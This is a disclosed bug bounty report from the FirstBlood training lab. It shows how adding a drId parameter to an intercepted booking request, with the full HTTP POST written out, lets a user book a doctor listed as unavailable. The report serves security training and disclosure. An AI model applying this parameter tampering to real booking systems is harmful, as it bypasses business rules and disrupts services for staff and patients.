FirstBlood-#1027 — Can make book appointment to unavailable doctor
This issue was discovered on FirstBlood v3
On 2022-12-08, properlay 
Level 7
reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Hello, I found a way to make book appointment to unavailable doctor.
To reproduce:
-
When booking a appointment, burp suite intercept ON
-
Then fill all the require info and click Book Appointment
-
On the intercept request, add drId=1
POST /api/ba.php HTTP/1.1
Host: e00b0c1f0b0b-properlay.a.firstbloodhackers.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Anti-Csrf: 82070-4702-33892
Content-Length: 137
Origin: https://e00b0c1f0b0b-properlay.a.firstbloodhackers.com
Referer: https://e00b0c1f0b0b-properlay.a.firstbloodhackers.com/book-appointment.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
fname=test&lname=test&address=test&city=test&phonenumber=123123&email=23123&dob=12/04/2022&a1=&a2=&a3=&message=&slot=3&drId=1
- Forward the request, you will see that you made a book appointment to Julie ( unavailable doctor for book appointment )
Impact:
Can make book appointment to unavailable doctor.
P4 Low
FirstBlood ID: 67
Vulnerability Type: Application/Business Logic
It is possible to book an unavailable doctor
Report Feedback
Creator & Administrator
Congratulations, you were the first to report this!